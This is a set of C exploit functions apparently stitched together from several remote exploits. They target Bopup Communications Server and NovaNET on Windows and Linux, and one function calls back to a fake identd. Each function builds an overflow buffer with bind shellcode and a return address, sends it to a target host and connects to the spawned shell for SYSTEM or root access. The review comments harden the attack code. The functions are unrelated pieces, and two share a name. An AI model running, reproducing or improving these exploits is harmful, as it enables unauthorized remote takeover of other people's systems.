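/*
 * Entry point of the Bopup Communications Server exploit.
 *
 * argv[1] is the target host.  Flow: connect to PORT_BOPUP, let zbuffami()
 * build the overflow request in zbuf, send it in one shot, wait briefly and
 * then try to reach the shell the payload is expected to bind on PORT_SHELL.
 *
 * Returns EXIT_SUCCESS only when the connect-back to PORT_SHELL succeeded and
 * shellami() returned.  A failed connect, a short send or an unreachable
 * shell all end with EXIT_FAILURE so a caller (script, harness) can tell the
 * difference; the original silently returned success when the shell never
 * came up.  A missing argument prints usage and exits EXIT_SUCCESS as before.
 */
int
main (int argc, char **argv)
{
  char zbuf[BUF_SIZE];
  int fd, n;
  /* Number of bytes actually transmitted to the target. */
  const int req_len = BOPUP_STR_OFFSET + BOPUP_STR_LEN;

  printf ("Bopup Communications Server remote SYSTEM exploit\n"
          "by: <*****@*****.**>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");

  if (argc <= 1)
    {
      fprintf (stderr, "Usage: %s <host>\n", argv[0]);
      exit (EXIT_SUCCESS);
    }

  fd = sockami (argv[1], PORT_BOPUP);
  if (fd == -1)
    {
      fprintf (stderr, "%s: sockami failed\n", argv[0]);
      exit (EXIT_FAILURE);
    }
  printf ("* connected to %s:%d\n\n", argv[1], PORT_BOPUP);

  /* Informational only: where the SEH record lands and what it is
   * overwritten with.  Both values are compile-time constants. */
  printf ("** SEH offset @+%04X\n", BOPUP_STR_OFFSET + BOPUP_STR_LEN - 8);
  printf ("** return addy @0x%08X\n\n", BOPUP_POPRET);

  /* NOTE(review): zbuffami() is assumed to write no more than BUF_SIZE
   * bytes and req_len is assumed to be <= BUF_SIZE; neither is visible
   * from here -- TODO confirm against the definitions. */
  printf ("* building buffer with shellcode...");
  zbuffami (zbuf);
  printf ("done\n");

  printf ("* sending request...");
  n = sock_send (fd, zbuf, req_len);
  if (n != req_len)
    {
      fprintf (stderr, "%s: sock_send returned %d (!= %d)\n",
               argv[0], n, req_len);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");
  close (fd);

  /* Give the remote payload time to set up its listener before we try. */
  printf ("* waiting for the shellcode to be executed...\n");
  sleep (2);

  fd = sockami (argv[1], PORT_SHELL);
  if (fd == -1)
    {
      /* Report it instead of exiting 0: the exploit did not pay off. */
      fprintf (stderr, "%s: no shell reachable on %s:%d\n",
               argv[0], argv[1], PORT_SHELL);
      return (EXIT_FAILURE);
    }

  printf ("+Wh00t!\n\n");
  shellami (fd);

  return (EXIT_SUCCESS);
}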
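/*
 * Second stage of the exploit: make the target issue an auth (ident)
 * request towards our fake identd, then connect to the shell that is
 * expected to be listening afterwards and hand it to shellami().
 *
 * Does nothing when the global `host` is empty.  Reads: host, MY_PORT,
 * THEIR_PORT.  The 6969 / 30464 pair is the connect-back hard-coded by the
 * original exploit; which one is the local and which the remote port depends
 * on sockami2()'s argument order, which is not visible here -- TODO confirm.
 *
 * Fix over the original: the descriptor returned by the second sockami2()
 * call is validated before it is handed to shellami(), the same way the
 * other exploits in this corpus check sockami() for -1.  A negative value
 * can never be a valid descriptor, so `< 0` is safe whatever sockami2()'s
 * exact failure convention is.
 */
void
keep_clz (void)
{
  int trigger_fd, shell_fd;

  if (host[0] == 0)
    return;

  printf ("+Causing an auth request to our fake_identd\n");
  trigger_fd = sockami2 (host, MY_PORT, THEIR_PORT);
  printf (" done\n");

  /* The trigger connection only has to exist; drop it right away. */
  if (trigger_fd >= 0)
    close (trigger_fd);

  printf ("+Enjoy your root shell...\n 0x69 =)\n");
  sleep (1);

  shell_fd = sockami2 (host, 6969, 30464);
  if (shell_fd < 0)
    {
      fprintf (stderr, "keep_clz: connecting to the shell failed\n");
      return;
    }
  shellami (shell_fd);
}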
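/*
 * Windows (nnwindtb.dll) variant of the NovaNET overflow.
 *
 * thost:    target host.
 * d_name:   domain name copied into the login packet.  Exactly
 *           NOVANET_DOMAIN_SZ bytes are read from it; NOTE(review): the
 *           length of d_name is not checked here, callers must supply a
 *           buffer at least that long -- TODO confirm.
 * esp_val:  value folded into the leaked canary by CANARY_VAL().
 *
 * Sequence: leak the stack canary out of the remote process with
 * novanet_read(), connect, send the login packet, consume the fourth reply
 * packet, announce the length of the final payload in rem_buf, then send the
 * "hammer" packet that carries the canary, the NTDLL_ESP return and
 * win32_x86_bind.  Finally try to reach the bound shell on PORT_SHELL.
 * Every protocol failure is fatal (exit(EXIT_FAILURE)).
 *
 * Changes over the original: malloc() is checked before use, and the 32-bit
 * fields are written with memcpy() instead of `*(unsigned int *)&buf[off]`,
 * which on rem_buf (a char array) was a strict-aliasing violation and a
 * potentially misaligned store.  The bytes produced are identical.
 */
static void
novanet_own_process (char *thost, char *d_name, int esp_val)
{
  char rbuf_pkt[NOVANET_PKT_SZ], *ptr;
  int canary_val, fd, n, rlen;
  unsigned int field;

  if (novanet_read (thost, (void *) 0x016A6784, &canary_val) == 0)
    {
      fprintf (stderr, "novanet_own_process: reading canary failed\n");
      exit (EXIT_FAILURE);
    }

  fd = sockami (thost, NOVANET_TCP_PORT);
  if (fd == -1)
    {
      fprintf (stderr, "novanet_own_process: sockami failed\n");
      exit (EXIT_FAILURE);
    }

  printf ("** [nnwindtb.dll @ 0x016A6784] stack canary: 0x%08X\n\n",
          (unsigned int) canary_val);

  /* A NUL byte inside the combined value would truncate the payload. */
  if (HAS_NULL (CANARY_VAL (canary_val, esp_val)))
    {
      fprintf (stderr, "novanet_own_process: canary value invalid :(\n");
      exit (EXIT_FAILURE);
    }

  printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT);

  /* Patch the domain into the login template at its fixed offset. */
  memcpy (&login_buf[0x54], d_name, NOVANET_DOMAIN_SZ);

  printf ("** sending login packet...");
  n = sock_send (fd, login_buf, sizeof login_buf - 1);
  if (n != NOVANET_PKT_SZ)
    {
      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
               n, NOVANET_PKT_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  /* The reply content is not inspected; it only has to arrive. */
  printf ("** reading fourth packet...");
  n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt);
  if (n != NOVANET_PKT_SZ)
    {
      fprintf (stderr, "novanet_own_process: sock_recv returned %d (!= %d)\n",
               n, NOVANET_PKT_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  /* Payload layout: 0x10C bytes of filler (canary at 0x104, return at
   * 0x108), 64 bytes of padding, the shellcode, one terminating NUL. */
  rlen = 0x10C + 64 + (sizeof win32_x86_bind - 1) + 1;
  field = rlen + NOVANET_HDR_SZ;
  memcpy (&rem_buf[12], &field, sizeof field);

  printf ("** sending remaining %d-bytes packet...", rlen);
  n = sock_send (fd, rem_buf, sizeof rem_buf - 1);
  if (n != NOVANET_HDR_SZ)
    {
      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
               n, NOVANET_HDR_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  printf ("** sending hammer packet...");
  ptr = malloc ((size_t) rlen);
  if (ptr == NULL)
    {
      fprintf (stderr, "novanet_own_process: malloc(%d) failed\n", rlen);
      exit (EXIT_FAILURE);
    }
  memset (ptr, 0x41, rlen);
  field = CANARY_VAL (canary_val, esp_val);
  memcpy (&ptr[0x104], &field, sizeof field);
  field = NTDLL_ESP;
  memcpy (&ptr[0x108], &field, sizeof field);
  memcpy (&ptr[0x10C + 64], win32_x86_bind, sizeof win32_x86_bind - 1);
  ptr[rlen - 1] = '\0';

  n = sock_send (fd, ptr, rlen);
  if (n != rlen)
    {
      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
               n, rlen);
      exit (EXIT_FAILURE);
    }
  free (ptr);
  ptr = NULL;
  printf ("done\n\n");

  /* Let the server consume the packet before the connection goes away. */
  usleep (USLEEP_TIME);
  close (fd);

  printf ("* waiting for the shellcode to be executed...\n");
  sleep (2);

  fd = sockami (thost, PORT_SHELL);
  if (fd != -1)
    {
      printf ("+Wh00t!\n\n");
      shellami (fd);
    }
}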
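/*
 * Linux variant of the NovaNET overflow.
 *
 * thost:   target host.
 * d_name:  domain name copied into the login packet.  Exactly
 *          NOVANET_DOMAIN_SZ bytes are read from it; NOTE(review): the
 *          length of d_name is not checked here, callers must supply a
 *          buffer at least that long -- TODO confirm.
 *
 * Sequence: connect, send the login packet, consume the fourth reply
 * packet, announce the length of the final payload in rem_buf, then send
 * the "hammer" packet: lnx_x86_bind at offset 0, filler, NOVANET_POPRET
 * at 0x134, one terminating NUL.  Finally try to reach the bound shell on
 * PORT_SHELL.  Every protocol failure is fatal (exit(EXIT_FAILURE)).
 *
 * NOTE(review): the shellcode is copied over the filler starting at
 * offset 0 and the return address is placed at 0x134; this only holds if
 * sizeof lnx_x86_bind - 1 <= 0x134, which is not checked -- TODO confirm.
 *
 * Changes over the original: malloc() is checked before use, and the 32-bit
 * fields are written with memcpy() instead of `*(unsigned int *)&buf[off]`,
 * which on rem_buf (a char array) was a strict-aliasing violation and a
 * potentially misaligned store.  The bytes produced are identical.
 */
static void
novanet_own_process (char *thost, char *d_name)
{
  char rbuf_pkt[NOVANET_PKT_SZ], *ptr;
  int fd, n, rlen;
  unsigned int field;

  fd = sockami (thost, NOVANET_TCP_PORT);
  if (fd == -1)
    {
      fprintf (stderr, "novanet_own_process: sockami failed\n");
      exit (EXIT_FAILURE);
    }
  printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT);

  /* Patch the domain into the login template at its fixed offset. */
  memcpy (&login_buf[0x54], d_name, NOVANET_DOMAIN_SZ);

  printf ("** sending login packet...");
  n = sock_send (fd, login_buf, sizeof login_buf - 1);
  if (n != NOVANET_PKT_SZ)
    {
      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
               n, NOVANET_PKT_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  /* The reply content is not inspected; it only has to arrive. */
  printf ("** reading fourth packet...");
  n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt);
  if (n != NOVANET_PKT_SZ)
    {
      fprintf (stderr, "novanet_own_process: sock_recv returned %d (!= %d)\n",
               n, NOVANET_PKT_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  /* 0x138 bytes of payload plus one terminating NUL. */
  rlen = 0x138 + 1;
  field = rlen + NOVANET_HDR_SZ;
  memcpy (&rem_buf[12], &field, sizeof field);

  printf ("** sending remaining %d-bytes packet...", rlen);
  n = sock_send (fd, rem_buf, sizeof rem_buf - 1);
  if (n != NOVANET_HDR_SZ)
    {
      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
               n, NOVANET_HDR_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  printf ("** sending hammer packet...");
  ptr = malloc ((size_t) rlen);
  if (ptr == NULL)
    {
      fprintf (stderr, "novanet_own_process: malloc(%d) failed\n", rlen);
      exit (EXIT_FAILURE);
    }
  memset (ptr, 0x41, rlen);
  field = NOVANET_POPRET;
  memcpy (&ptr[0x134], &field, sizeof field);
  memcpy (&ptr[0], lnx_x86_bind, sizeof lnx_x86_bind - 1);
  ptr[rlen - 1] = '\0';

  n = sock_send (fd, ptr, rlen);
  if (n != rlen)
    {
      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
               n, rlen);
      exit (EXIT_FAILURE);
    }
  free (ptr);
  ptr = NULL;
  printf ("done\n\n");

  /* Let the server consume the packet before the connection goes away. */
  usleep (USLEEP_TIME);
  close (fd);

  printf ("* waiting for the shellcode to be executed...\n");
  sleep (2);

  fd = sockami (thost, PORT_SHELL);
  if (fd != -1)
    {
      printf ("+Wh00t!\n\n");
      shellami (fd);
    }
}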